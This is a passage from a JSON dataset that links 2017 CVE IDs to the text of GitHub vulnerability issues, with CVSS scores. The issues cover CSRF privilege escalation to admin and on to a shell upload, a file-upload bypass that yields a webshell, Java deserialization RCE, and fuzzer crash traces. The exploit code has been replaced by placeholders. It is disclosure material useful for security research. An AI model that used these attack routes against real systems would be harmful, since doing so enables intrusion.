If the victim is an administrative account, CSRF can compromise the entire web application. APITAG have role for type person:_ admin NUMBERTAG user NUMBERTAG operator NUMBERTAG costumer NUMBERTAG partner NUMBERTAG group NUMBERTAG III. Exploit: \u2014> The first CSRF Target is: PATHTAG /person/\u201d APITAG Records People & Companies) The guest (no have account) can make admin privilege with CSRF Remote Code Execution. This is script for make account admin: ERRORTAG \u2014> The second CSRF target is: /admin/home /logos/ APITAG Config Logos) If we have minimum low privilege, we can remote code execute to make shell on module logos APITAG of Page Header, Login Page and Reports Logo). The APITAG unrestricted file extension but normally access only for admin. If you have low privilege, please choose which one to execute this code (before execute, you shall login into application):\u2028 ERRORTAG \u2014\u2014\u2014\u2014 ERRORTAG \u2014\u2014\u2014\u2014\u2014\u2014\u2014 ERRORTAG \u2014\u2014\u2014\u2014 If you have executed and success, check your file on: URLTAG and PWN ^_^ URLTAG Refer: URLTAG URLTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  14049. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  14050. "severity": "HIGH",
  14051. "baseScore": 8.8,
  14052. "impactScore": 5.9,
  14053. "exploitabilityScore": 2.8
  14054. },
  14055. {
  14056. "CVE_ID": "CVE-2017-7448",
  14057. "Issue_Url_old": "https://github.com/dropbox/lepton/issues/86",
  14058. "Issue_Url_new": "https://github.com/dropbox/lepton/issues/86",
  14059. "Repo_new": "dropbox/lepton",
  14060. "Issue_Created_At": "2017-03-31T16:43:13Z",
  14061. "description": "SIGFPE has been triggered when process malformed JPG file. Hello, the attachments are some samples that can cause SIGFPE that caused by devided by zero at PATHTAG This exception can cause Denial of Service of lepton. FILETAG You can reproduce it with: ./lepton FILETAG Here are the debugging info with gdb: APITAG NUMBERTAG for (int cmp NUMBERTAG cmp APITAG max_cmp_bc NUMBERTAG bc_allocated = max_cmp_bc (max_cmp_bc % APITAG NUMBERTAG if (cmp == desired_cmp) { APITAG NUMBERTAG fffdf7fde NUMBERTAG fffdf7fde NUMBERTAG ad \u25c2\u2014 test rax, ra NUMBERTAG fffdf7fde NUMBERTAG fffdf7fde NUMBERTAG fff NUMBERTAG fffdf7fdea NUMBERTAG fffdf7fdea NUMBERTAG a NUMBERTAG fffdf7fdeb NUMBERTAG fffdf7fdeb NUMBERTAG APITAG \u25c2\u2014 mov byte ptr [rsp NUMBERTAG APITAG \u25ba f NUMBERTAG b NUMBERTAG a f NUMBERTAG b NUMBERTAG a f NUMBERTAG efb setup_imginfo_jpg(bool NUMBERTAG f NUMBERTAG cc2b f NUMBERTAG dd NUMBERTAG f NUMBERTAG dd NUMBERTAG f NUMBERTAG ae f NUMBERTAG aa7 f NUMBERTAG ffff NUMBERTAG libc_start_main NUMBERTAG Program received signal SIGFPE pwndbg> p total_req_blocks NUMBERTAG pwndbg> bt NUMBERTAG b NUMBERTAG a in APITAG (memory_optimized=false, framebuffer NUMBERTAG c NUMBERTAG APITAG , desired_cmp NUMBERTAG this NUMBERTAG c NUMBERTAG APITAG ) at PATHTAG NUMBERTAG APITAG (this NUMBERTAG c NUMBERTAG APITAG , cmpinfo=..., cmpc NUMBERTAG mcuh=<optimized out>, mcuv=<optimized out>, APITAG out>) at PATHTAG NUMBERTAG efb in setup_imginfo_jpg APITAG at PATHTAG NUMBERTAG cc2b in read_jpeg APITAG APITAG out>, jpg_in NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG dd NUMBERTAG in std::function<bool APITAG const (this NUMBERTAG fffffffd9a0) at PATHTAG NUMBERTAG execute(std::function<bool ()> const&) (function=...) 
at PATHTAG NUMBERTAG ae in process_file (reader=reader APITAG writer=writer APITAG APITAG force_zlib0=<optimized out>) at PATHTAG NUMBERTAG aa7 in app_main (argc NUMBERTAG argv=<optimized out>) at PATHTAG NUMBERTAG ffff NUMBERTAG in __libc_start_main (main NUMBERTAG main(int, char )>, argc NUMBERTAG arg NUMBERTAG fffffffdc NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffdc NUMBERTAG at PATHTAG NUMBERTAG in _start ()",
  14062. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14063. "severity": "MEDIUM",
  14064. "baseScore": 5.5,
  14065. "impactScore": 3.6,
  14066. "exploitabilityScore": 1.8
  14067. },
  14068. {
  14069. "CVE_ID": "CVE-2017-7452",
  14070. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/8",
  14071. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/8",
  14072. "Repo_new": "jsummers/imageworsener",
  14073. "Issue_Created_At": "2017-04-03T06:06:01Z",
  14074. "description": "NULL pointer dereference in iwbmp_read_info_header. on APITAG NUMBERTAG imagew $FILE FILETAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG bp NUMBERTAG fffaaf NUMBERTAG fb0 sp NUMBERTAG fffaaf NUMBERTAG d NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG in iwbmp_read_info_header PATHTAG NUMBERTAG in iw_read_bmp_file PATHTAG NUMBERTAG c NUMBERTAG in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG f NUMBERTAG fb NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG bbeb in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in iwbmp_read_info_header NUMBERTAG ABORTING testcase: URLTAG",
  14075. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14076. "severity": "MEDIUM",
  14077. "baseScore": 5.5,
  14078. "impactScore": 3.6,
  14079. "exploitabilityScore": 1.8
  14080. },
  14081. {
  14082. "CVE_ID": "CVE-2017-7453",
  14083. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/9",
  14084. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/9",
  14085. "Repo_new": "jsummers/imageworsener",
  14086. "Issue_Created_At": "2017-04-03T06:07:11Z",
  14087. "description": "NULL pointer dereference in iwgif_record_pixel. on APITAG NUMBERTAG imagew $FILE FILETAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG eb bp NUMBERTAG fff NUMBERTAG bfd4b0 sp NUMBERTAG fff NUMBERTAG bfd NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG ea in iwgif_record_pixel PATHTAG NUMBERTAG in lzw_emit_code PATHTAG NUMBERTAG ea in lzw_process_code PATHTAG NUMBERTAG dd0 in lzw_process_bytes PATHTAG NUMBERTAG d0 in iwgif_read_image PATHTAG NUMBERTAG in iwgif_read_main PATHTAG NUMBERTAG bdd in iw_read_gif_file PATHTAG NUMBERTAG c NUMBERTAG in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG a8b NUMBERTAG in __libc_start_main APITAG NUMBERTAG bbeb in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in iwgif_record_pixel testcase: URLTAG",
  14088. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14089. "severity": "MEDIUM",
  14090. "baseScore": 5.5,
  14091. "impactScore": 3.6,
  14092. "exploitabilityScore": 1.8
  14093. },
  14094. {
  14095. "CVE_ID": "CVE-2017-7454",
  14096. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/11",
  14097. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/11",
  14098. "Repo_new": "jsummers/imageworsener",
  14099. "Issue_Created_At": "2017-04-03T06:08:23Z",
  14100. "description": "heap buffer overflow in iwgif_record_pixel. on APITAG NUMBERTAG imagew $FILE FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG b bp NUMBERTAG ffe NUMBERTAG f NUMBERTAG sp NUMBERTAG ffe NUMBERTAG f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG a in iwgif_record_pixel PATHTAG NUMBERTAG in lzw_emit_code PATHTAG NUMBERTAG cc in lzw_process_code PATHTAG NUMBERTAG dd0 in lzw_process_bytes PATHTAG NUMBERTAG d0 in iwgif_read_image PATHTAG NUMBERTAG in iwgif_read_main PATHTAG NUMBERTAG bdd in iw_read_gif_file PATHTAG NUMBERTAG c NUMBERTAG in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG f NUMBERTAG dcbcb NUMBERTAG in __libc_start_main APITAG NUMBERTAG bbeb in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG e0ad6 in malloc PATHTAG NUMBERTAG b7b in my_mallocfn PATHTAG NUMBERTAG aa NUMBERTAG a in iw_malloc_ex PATHTAG NUMBERTAG aa3b0 in iw_malloc PATHTAG NUMBERTAG fa in iwgif_make_row_pointers PATHTAG NUMBERTAG fac in iwgif_read_image PATHTAG NUMBERTAG in iwgif_read_main PATHTAG NUMBERTAG bdd in iw_read_gif_file PATHTAG NUMBERTAG c NUMBERTAG in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG f NUMBERTAG dcbcb NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG heap buffer overflow PATHTAG in iwgif_record_pixel Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa]fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff 
NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING testcase: URLTAG",
  14101. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14102. "severity": "MEDIUM",
  14103. "baseScore": 5.5,
  14104. "impactScore": 3.6,
  14105. "exploitabilityScore": 1.8
  14106. },
  14107. {
  14108. "CVE_ID": "CVE-2017-7525",
  14109. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1599",
  14110. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1599",
  14111. "Repo_new": "fasterxml/jackson-databind",
  14112. "Issue_Created_At": "2017-04-11T12:39:46Z",
  14113. "description": "Jackson Deserializer vulnerability, can execute any code or command. Jackson Deserializer vulnerability, can execute any code or command The trigger condition of the vulnerability is APITAG deserialization before the call to the APITAG method; this method allows deserializing Java objects of the class name specified in the JSON string, and the use of Object, Map, List and other objects will cause deserialization vulnerabilities. Please refer to the POC; the POC is an Eclipse project under Maven. The POC command pops up the calculator on Mac or Windows. POC verification of various cases list: PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG You only need to do the following code to trigger the vulnerability: APITAG mapper = new APITAG (); / / you must call the APITAG method APITAG (); APITAG (\"JSON string specified\", APITAG FILETAG",
  14114. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14115. "severity": "CRITICAL",
  14116. "baseScore": 9.8,
  14117. "impactScore": 5.9,
  14118. "exploitabilityScore": 3.9
  14119. },
  14120. {
  14121. "CVE_ID": "CVE-2017-7525",
  14122. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1723",
  14123. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1723",
  14124. "Repo_new": "fasterxml/jackson-databind",
  14125. "Issue_Created_At": "2017-08-04T08:06:36Z",
  14126. "description": "CVETAG jackson databind: Deserialization vulnerability via APITAG method of APITAG There is this vulnerability ( CVETAG , CVETAG in jackson databind that allows remote code execution. I tried to check existing issues but could not find anything related. This vulnerability has been reported in NUMBERTAG as well as all pre releases of NUMBERTAG Is this actually fixed in NUMBERTAG or is there a patch release planned?",
  14127. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14128. "severity": "CRITICAL",
  14129. "baseScore": 9.8,
  14130. "impactScore": 5.9,
  14131. "exploitabilityScore": 3.9
  14132. },
  14133. {
  14134. "CVE_ID": "CVE-2017-7550",
  14135. "Issue_Url_old": "https://github.com/ansible/ansible/issues/30874",
  14136. "Issue_Url_new": "https://github.com/ansible/ansible/issues/30874",
  14137. "Repo_new": "ansible/ansible",
  14138. "Issue_Created_At": "2017-09-25T19:26:18Z",
  14139. "description": "jenkins_plugin \"params\" argument is insecure. ISSUE TYPE Bug Report COMPONENT NAME PATHTAG ANSIBLE VERSION APITAG CONFIGURATION N/A OS / ENVIRONMENT N/A SUMMARY It was noticed that using the jenkins_plugin with username and password would log the password on the remote host. After some digging I discovered that in addition to the normal url_username and url_password arguments for APITAG the jenkins_plugin module also has a params argument where arbitrary ansible module arguments can be given. This parameter should go away as it circumvents all the normal argument checking, validation, and normalization. For url_password, this is bad as using param to send in the url_password instead of the specific url_password argument allows the url_password to be logged. This can be a security problem. I also found the source of the user's use of param instead of url_username and url_password: the module documentation has an example of using param that has that in it. STEPS TO FIX I am going to immediately create and merge a PR to remove the param example and replace it with using the url_username and url_password arguments directly. The params argument should also be removed (as it bypasses the no_log setting on url_password, allowing the password to be logged by mistake). Additional parameters that the module uses should be explicitly stated in the argument_spec instead. (I took a look at the module and it does not appear that params is passed directly to the jenkins server, instead, specific keys are always plucked out of the params. So there should be no problem removing params.)",
  14140. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14141. "severity": "CRITICAL",
  14142. "baseScore": 9.8,
  14143. "impactScore": 5.9,
  14144. "exploitabilityScore": 3.9
  14145. },
  14146. {
  14147. "CVE_ID": "CVE-2017-7571",
  14148. "Issue_Url_old": "https://github.com/ladybirdweb/faveo-helpdesk/issues/446",
  14149. "Issue_Url_new": "https://github.com/ladybirdweb/faveo-helpdesk/issues/446",
  14150. "Repo_new": "ladybirdweb/faveo-helpdesk",
  14151. "Issue_Created_At": "2017-04-05T03:28:18Z",
  14152. "description": "CSRF Privilege Escalation APITAG of Role Agent to Admin) Vulnerability on Faveo version Community NUMBERTAG Exploit Title : CSRF Privilege Escalation APITAG of Role Agent to Admin) Vulnerability on Faveo version Community NUMBERTAG Date NUMBERTAG April NUMBERTAG Exploit Author : MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG Vendor Homepage : FILETAG Software Link : FILETAG Version : Community NUMBERTAG Tested on : Windows Server NUMBERTAG Datacenter Evaluation CVSS PATHTAG NUMBERTAG HIGH) I. Background: Faveo Helpdesk Open source ticketing system build on Laravel framework. Faveo word is derived from Latin which means to be favourable. Which truly highlights vision and the scope as well as the functionality of the product that Faveo is. It is specifically designed to cater the needs of startups and SME's empowering them with state of art, ticket based support system. In today's competitive startup scenario customer retention is one of the major challenges. Handling client query diligently is all the difference between retaining or losing a long lasting relationship. II. Description: Cross Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. 
Faveo have roles: user APITAG access backend) agent APITAG access backend but limited) admin APITAG full access backend) III. Exploit: CSRF Target is: PATHTAG user id NUMBERTAG role is agent) We have low privilege as \u201cagent\u201d to access application, and then want to change be admin role. Make sample our script of CSRF APITAG CODETAG Before running APITAG please login your account as agent and running your html script. Yeaaah, now user id NUMBERTAG become admin privilege ^_^ Refer: URLTAG URLTAG > I attach our screenshot and script CSRF: APITAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG",
  14153. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  14154. "severity": "HIGH",
  14155. "baseScore": 8.0,
  14156. "impactScore": 5.9,
  14157. "exploitabilityScore": 2.1
  14158. },
  14159. {
  14160. "CVE_ID": "CVE-2017-7578",
  14161. "Issue_Url_old": "https://github.com/libming/libming/issues/68",
  14162. "Issue_Url_new": "https://github.com/libming/libming/issues/68",
  14163. "Repo_new": "libming/libming",
  14164. "Issue_Created_At": "2017-03-21T10:37:48Z",
  14165. "description": "Heap overflows in parser.c. Dear all, The following bugs were found with AFLGo, a directed version of the fuzzer AFL / APITAG Thanks also to Van Thuan Pham. These issues are related to NUMBERTAG The Libming utility listswf crashes due to a heap based buffer overflow in the function APITAG and several other functions in parser.c. APITAG flags them as invalid writes \"of size NUMBERTAG but the heap can actually be written to multiple times (e.g., in each line of APITAG NUMBERTAG The overflows are caused by a pointer behind the bounds of a statically allocated array of structs of type SWF_GRADIENTRECORD. Sample crash inducing input: FILETAG ERRORTAG The bugs are fixed by the following patch (preventing the pointer behind the array bounds): CODETAG Best regards, Marcel Marcel B\u00f6hme Senior Research Fellow TSUNAMi Research Centre National University of Singapore",
  14166. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  14167. "severity": "HIGH",
  14168. "baseScore": 7.8,
  14169. "impactScore": 5.9,
  14170. "exploitabilityScore": 1.8
  14171. },
  14172. {
  14173. "CVE_ID": "CVE-2017-7623",
  14174. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/12",
  14175. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/12",
  14176. "Repo_new": "jsummers/imageworsener",
  14177. "Issue_Created_At": "2017-04-03T06:08:47Z",
  14178. "description": "heap buffer overflow in iwmiffr_convert_row NUMBERTAG on APITAG NUMBERTAG imagew $FILE FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG daae bp NUMBERTAG ffc NUMBERTAG d NUMBERTAG sp NUMBERTAG ffc NUMBERTAG d NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG daad in iwmiffr_convert_row NUMBERTAG PATHTAG NUMBERTAG a1c5 in iwmiff_read_pixels PATHTAG NUMBERTAG d8 in iw_read_miff_file PATHTAG NUMBERTAG be8 in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG fdcb NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG bbeb in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG e0c8d in calloc PATHTAG NUMBERTAG b NUMBERTAG in my_mallocfn PATHTAG NUMBERTAG aa NUMBERTAG a in iw_malloc_ex PATHTAG NUMBERTAG aa3e3 in iw_mallocz PATHTAG NUMBERTAG d NUMBERTAG in iwmiff_read_pixels PATHTAG NUMBERTAG d8 in iw_read_miff_file PATHTAG NUMBERTAG be8 in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG fdcb NUMBERTAG b NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG heap buffer overflow PATHTAG in iwmiffr_convert_row NUMBERTAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fb NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 
NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING testcase: URLTAG",
  14179. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14180. "severity": "MEDIUM",
  14181. "baseScore": 5.5,
  14182. "impactScore": 3.6,
  14183. "exploitabilityScore": 1.8
  14184. },
  14185. {
  14186. "CVE_ID": "CVE-2017-7624",
  14187. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/10",
  14188. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/10",
  14189. "Repo_new": "jsummers/imageworsener",
  14190. "Issue_Created_At": "2017-04-03T06:07:55Z",
  14191. "description": "memory leak in imagew cmd. on APITAG NUMBERTAG imagew $FILE FILETAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG e0ad6 in malloc PATHTAG NUMBERTAG b7b in my_mallocfn PATHTAG NUMBERTAG aa NUMBERTAG a in iw_malloc_ex PATHTAG NUMBERTAG aa NUMBERTAG a in iw_malloc_large PATHTAG NUMBERTAG ffe4 in bmpr_read_uncompressed PATHTAG NUMBERTAG be in iwbmp_read_bits PATHTAG NUMBERTAG e8 in iw_read_bmp_file PATHTAG NUMBERTAG c NUMBERTAG in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG fc NUMBERTAG fb NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: URLTAG",
  14192. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14193. "severity": "MEDIUM",
  14194. "baseScore": 5.5,
  14195. "impactScore": 3.6,
  14196. "exploitabilityScore": 1.8
  14197. },
  14198. {
  14199. "CVE_ID": "CVE-2017-7649",
  14200. "Issue_Url_old": "https://github.com/eclipse/kura/issues/956",
  14201. "Issue_Url_new": "https://github.com/eclipse/kura/issues/956",
  14202. "Repo_new": "eclipse/kura",
  14203. "Issue_Created_At": "2016-12-16T18:03:33Z",
  14204. "description": "APITAG Kura firewall rules bypassed with IP NUMBERTAG The firewall rules set by Kura can be bypassed using IP NUMBERTAG The Kura install scripts, for installers that include network management, should disable IP NUMBERTAG on the host system. We will remove this once we add proper support to IP NUMBERTAG in Kura.",
  14205. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14206. "severity": "CRITICAL",
  14207. "baseScore": 9.8,
  14208. "impactScore": 5.9,
  14209. "exploitabilityScore": 3.9
  14210. },
  14211. {
  14212. "CVE_ID": "CVE-2017-7694",
  14213. "Issue_Url_old": "https://github.com/symphonycms/symphony-2/issues/2655",
  14214. "Issue_Url_new": "https://github.com/symphonycms/symphonycms/issues/2655",
  14215. "Repo_new": "symphonycms/symphonycms",
  14216. "Issue_Created_At": "2017-04-07T21:49:25Z",
  14217. "description": "security bug Reported.",
  14218. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  14219. "severity": "HIGH",
  14220. "baseScore": 8.8,
  14221. "impactScore": 5.9,
  14222. "exploitabilityScore": 2.8
  14223. },
  14224. {
  14225. "CVE_ID": "CVE-2017-7695",
  14226. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/276",
  14227. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/276",
  14228. "Repo_new": "bigtreecms/bigtree-cms",
  14229. "Issue_Created_At": "2017-04-07T07:52:13Z",
  14230. "description": "Unrestricted File Upload Reported. Exploit Title: Unrestricted File Upload Vulnerability Type: Accessing, Modifying or Executing Executable Files (CAPEC NUMBERTAG Reporting Date NUMBERTAG Author: MENTIONTAG Vendor Homepage: FILETAG Software Link: URLTAG Version NUMBERTAG I. Abstract APITAG CMS is publicly licensed under the GNU Lesser General Public License It is an open source content management system built on PHP and APITAG II. Introduction NUMBERTAG Accessing, Modifying or Executing Executable Files An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in sync regarding the interfaces and the correct privileges for each interface NUMBERTAG Vulnerability analysis for bigtree cms At the file PATHTAG line NUMBERTAG The regular expression in the code shows that it could be bypassed by uploading a file Name APITAG var APITAG = PATHTAG APITAG Then the attacker could get a webshell by using this method III. References NUMBERTAG CAPEC NUMBERTAG CVETAG NUMBERTAG URLTAG",
  14231. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14232. "severity": "CRITICAL",
  14233. "baseScore": 9.8,
  14234. "impactScore": 5.9,
  14235. "exploitabilityScore": 3.9
  14236. },
  14237. {
  14238. "CVE_ID": "CVE-2017-7697",
  14239. "Issue_Url_old": "https://github.com/erikd/libsamplerate/issues/11",
  14240. "Issue_Url_new": "https://github.com/libsndfile/libsamplerate/issues/11",
  14241. "Repo_new": "libsndfile/libsamplerate",
  14242. "Issue_Created_At": "2017-04-11T09:11:28Z",
  14243. "description": "global buffer overflow in calc_output_single (src_sinc.c). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  14244. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14245. "severity": "MEDIUM",
  14246. "baseScore": 5.5,
  14247. "impactScore": 3.6,
  14248. "exploitabilityScore": 1.8
  14249. },
  14250. {
  14251. "CVE_ID": "CVE-2017-7716",
  14252. "Issue_Url_old": "https://github.com/radare/radare2/issues/7260",
  14253. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7260",
  14254. "Repo_new": "radareorg/radare2",
  14255. "Issue_Created_At": "2017-04-12T11:33:52Z",
  14256. "description": "Heap out of bounds read in APITAG Heap out of bounds read in APITAG Tested on Git HEAD: APITAG Payload: URLTAG Command: APITAG ASAN: ERRORTAG",
  14257. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14258. "severity": "MEDIUM",
  14259. "baseScore": 5.5,
  14260. "impactScore": 3.6,
  14261. "exploitabilityScore": 1.8
  14262. },
  14263. {
  14264. "CVE_ID": "CVE-2017-7854",
  14265. "Issue_Url_old": "https://github.com/radare/radare2/issues/7265",
  14266. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7265",
  14267. "Repo_new": "radareorg/radare2",
  14268. "Issue_Created_At": "2017-04-13T11:01:41Z",
  14269. "description": "Heap out of bounds read in APITAG Heap out of bounds read in APITAG Tested on Git HEAD: APITAG Payload: radare/radare2 regressions NUMBERTAG Command: APITAG ASAN: ERRORTAG",
  14270. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14271. "severity": "MEDIUM",
  14272. "baseScore": 5.5,
  14273. "impactScore": 3.6,
  14274. "exploitabilityScore": 1.8
  14275. },
  14276. {
  14277. "CVE_ID": "CVE-2017-7871",
